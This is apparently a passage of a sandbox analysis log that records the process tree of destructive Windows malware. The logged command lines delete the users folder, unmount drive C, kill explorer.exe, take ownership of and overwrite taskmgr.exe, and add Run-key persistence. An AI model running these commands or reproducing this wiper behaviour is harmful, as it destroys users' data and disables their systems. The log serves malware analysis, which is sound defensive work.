    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3010.exe /KillHardDisk 1698005182
    3⤵
    PID:13104
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del C:\users /r /f
      4⤵
      PID:14768
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3010.exe /killMBR 1698005182
  2⤵
  PID:14140
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3010.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3010.exe /killMBR 1698005182
    3⤵
    PID:13848
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3010.exe /autoup 1698005182
  2⤵
  PID:5032

C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe
C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe 1698005182
1⤵
- Executes dropped EXE
PID:7612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
  2⤵
  PID:7996
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - Kills process with taskkill
    PID:7444
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe /autoup 1698005182
  2⤵
  PID:8544
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe /autoup 1698005182
    3⤵
    - Adds Run key to start application
    PID:8244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe /killwindows 1698005182
  2⤵
  PID:1848
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe /killwindows 1698005182
    3⤵
    PID:11096
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
      4⤵
      PID:11396
    - - C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        5⤵
        Modifies file permissions
        
        PID:13940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe /KillHardDisk 1698005182
  2⤵
  PID:11576
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe /KillHardDisk 1698005182
    3⤵
    PID:10376
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c mountvol c: /d
      4⤵
      PID:13596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe /killMBR 1698005182
  2⤵
  PID:14120
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe /killMBR 1698005182
    3⤵
    PID:2708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe /KillHardDisk 1698005182
  2⤵
  PID:15416

C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3030.exe
C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3030.exe 1698005182
1⤵
- Executes dropped EXE
PID:7524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
  2⤵
  PID:7532
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - Kills process with taskkill
    PID:8456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3030.exe /autoup 1698005182
  2⤵
  PID:6540
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3030.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3030.exe /autoup 1698005182
    3⤵
    - Adds Run key to start application
    PID:6480
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3030.exe /killwindows 1698005182
  2⤵
  PID:6532
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3030.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3030.exe /killwindows 1698005182
    3⤵
    PID:10580
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
      4⤵
      PID:3776
    - - C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        5⤵
        Modifies file permissions
        
        PID:11712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3030.exe /KillHardDisk 1698005182
  2⤵
  PID:6116
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3030.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3030.exe /KillHardDisk 1698005182
    3⤵
    PID:12836
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del C:\users /r /f
      4⤵
      PID:14044
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del C:\users /r /f
      4⤵
      PID:6476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3030.exe /killMBR 1698005182
  2⤵
  PID:13336
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3030.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3030.exe /killMBR 1698005182
    3⤵
    PID:15108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3030.exe /protect 1698005182
  2⤵
  PID:15372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3030.exe /autoup 1698005182
  2⤵
  PID:15468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30.exe+024005.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc300.exe
1⤵
PID:6768

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
1⤵
PID:5588
- C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe
  C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe 1698005182
  2⤵
  - Executes dropped EXE
  PID:7392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe /autoup 1698005182
    3⤵
    PID:9912
  - - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe
      C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe /autoup 1698005182
      4⤵
      PID:3500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe /killwindows 1698005182
    3⤵
    PID:6488
  - - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe
      C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe /killwindows 1698005182
      4⤵
      PID:10980
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        5⤵
        
        PID:11412
      - C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        6⤵
        Modifies file permissions
        
        PID:13368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe /KillHardDisk 1698005182
    3⤵
    PID:11500
  - - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe
      C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe /KillHardDisk 1698005182
      4⤵
      PID:11220
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c mountvol c: /d
        5⤵
        
        PID:16356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe /killMBR 1698005182
    3⤵
    PID:14300
  - - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe
      C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe /killMBR 1698005182
      4⤵
      PID:13100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cpoy C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3057.exe C:\windows\system32\taskmgr.exe
    3⤵
    PID:15436

C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe
C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe 1698005182
1⤵
PID:6244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
  2⤵
  PID:8376
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - Kills process with taskkill
    PID:9640
- C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe
  C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc308.exe /save 1698005182
  2⤵
  - Executes dropped EXE
  PID:5776
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc303.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc303.exe /protect 1698005182
    3⤵
    - Executes dropped EXE
    PID:5368
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3030.exe 1698005182
      4⤵
      PID:8968

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
1⤵
PID:5956
- C:\Windows\system32\taskkill.exe
  taskkill /f /im explorer.exe
  2⤵
  - Kills process with taskkill
  PID:7328

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
1⤵
PID:8084
- C:\Windows\system32\taskkill.exe
  taskkill /f /im explorer.exe
  2⤵
  - Kills process with taskkill
  PID:7812

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe 1698005182
1⤵
PID:8308
- C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe
  C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe 1698005182
  2⤵
  PID:8808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe /autoup 1698005182
    3⤵
    PID:9072
  - - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe
      C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe /autoup 1698005182
      4⤵
      PID:1664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe /killwindows 1698005182
    3⤵
    PID:10660
  - - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe
      C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe /killwindows 1698005182
      4⤵
      PID:2424
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        5⤵
        
        PID:13176
      - C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        6⤵
        Modifies file permissions
        
        PID:15052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe /KillHardDisk 1698005182
    3⤵
    PID:13164
  - - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe
      C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe /KillHardDisk 1698005182
      4⤵
      PID:14840
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        5⤵
        
        PID:15308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe /killMBR 1698005182
    3⤵
    PID:13604

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
1⤵
PID:6728
- C:\Windows\system32\taskkill.exe
  taskkill /f /im explorer.exe
  2⤵
  - Kills process with taskkill
  PID:7348

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
1⤵
PID:6920
- C:\Windows\system32\taskkill.exe
  taskkill /f /im explorer.exe
  2⤵
  - Kills process with taskkill
  PID:6812

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc301.exe+024005.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3010.exe
1⤵
PID:5164

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3054.exe+415973.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc30544.exe
1⤵
PID:8120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3080.exe 1698005182
1⤵
PID:7408
- C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3080.exe
  C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3080.exe 1698005182
  2⤵
  PID:8640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
    3⤵
    PID:8540
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im explorer.exe
      4⤵
      Kills process with taskkill
      PID:8732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3080.exe /autoup 1698005182
    3⤵
    PID:9268
  - - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3080.exe
      C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3080.exe /autoup 1698005182
      4⤵
      PID:2380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3080.exe /killwindows 1698005182
    3⤵
    PID:9152
  - - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3080.exe
      C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3080.exe /killwindows 1698005182
      4⤵
      PID:11832
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
        5⤵
        
        PID:12732
      - C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        6⤵
        Modifies file permissions
        
        PID:12904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3080.exe /KillHardDisk 1698005182
    3⤵
    PID:12516
  - - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3080.exe
      C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3080.exe /KillHardDisk 1698005182
      4⤵
      PID:12208
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        5⤵
        
        PID:13420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3080.exe /killMBR 1698005182
    3⤵
    PID:14676
  - - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3080.exe
      C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3080.exe /killMBR 1698005182
      4⤵
      PID:16308
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3080.exe /protect 1698005182
    3⤵
    PID:16108

C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3051.exe
C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3051.exe /save 1698005182
1⤵
- Executes dropped EXE
PID:7368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3087.exe 1698005182
1⤵
PID:7328

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3010.exe 1698005182
1⤵
PID:3204

C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc303.exe
C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc303.exe /save 1698005182
1⤵
- Executes dropped EXE
PID:2092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
1⤵
PID:6924
- C:\Windows\system32\taskkill.exe
  taskkill /f /im explorer.exe
  2⤵
  - Kills process with taskkill
  PID:5436

C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe
C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3050.exe 1698005182
1⤵
PID:4572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
  2⤵
  PID:10040
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - Kills process with taskkill
    PID:4740

C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe 1698005182
1⤵
PID:9392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
  2⤵
  PID:9788
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - Kills process with taskkill
    PID:3812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /autoup 1698005182
  2⤵
  PID:5580
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /autoup 1698005182
    3⤵
    PID:6800
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /killwindows 1698005182
  2⤵
  PID:12084
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /killwindows 1698005182
    3⤵
    PID:13552
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
      4⤵
      PID:15176
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /KillHardDisk 1698005182
  2⤵
  PID:11580
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /KillHardDisk 1698005182
    3⤵
    PID:2624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc305.exe /autoup 1698005182
  2⤵
  PID:3552

C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc300.exe
C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc300.exe 1698005182
1⤵
PID:9328
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
  2⤵
  PID:10180
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - Kills process with taskkill
    PID:5508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc300.exe /autoup 1698005182
  2⤵
  PID:3360
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc300.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc300.exe /autoup 1698005182
    3⤵
    PID:11028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc300.exe /killwindows 1698005182
  2⤵
  PID:11440
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc300.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc300.exe /killwindows 1698005182
    3⤵
    PID:13304
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:8588
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
      4⤵
      PID:13328
    - - C:\Windows\system32\takeown.exe
        
        takeown /f C:\windows\system32\taskmgr.exe
        5⤵
        Modifies file permissions
        
        PID:16080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc300.exe /KillHardDisk 1698005182
  2⤵
  PID:13820
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc300.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc300.exe /KillHardDisk 1698005182
    3⤵
    PID:10620
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc300.exe /killMBR 1698005182
  2⤵
  PID:16096
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc300.exe /protect 1698005182
  2⤵
  PID:12276

C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3030.exe
C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3030.exe 1698005182
1⤵
PID:9320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
  2⤵
  PID:10192
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - Kills process with taskkill
    PID:10096
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3030.exe /autoup 1698005182
  2⤵
  PID:9420
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3030.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3030.exe /autoup 1698005182
    3⤵
    PID:9412
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3030.exe /killwindows 1698005182
  2⤵
  PID:11860
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3030.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3030.exe /killwindows 1698005182
    3⤵
    PID:13504
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
      4⤵
      PID:1172
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3030.exe /KillHardDisk 1698005182
  2⤵
  PID:3652
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3030.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3030.exe /KillHardDisk 1698005182
    3⤵
    PID:15428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc3030.exe /killMBR 1698005182
  2⤵
  PID:14980

C:\Users\Admin\AppData\Local\Temp\NEAS.5dcc0a7f339e3d03202e41f07ff3dc304.exe
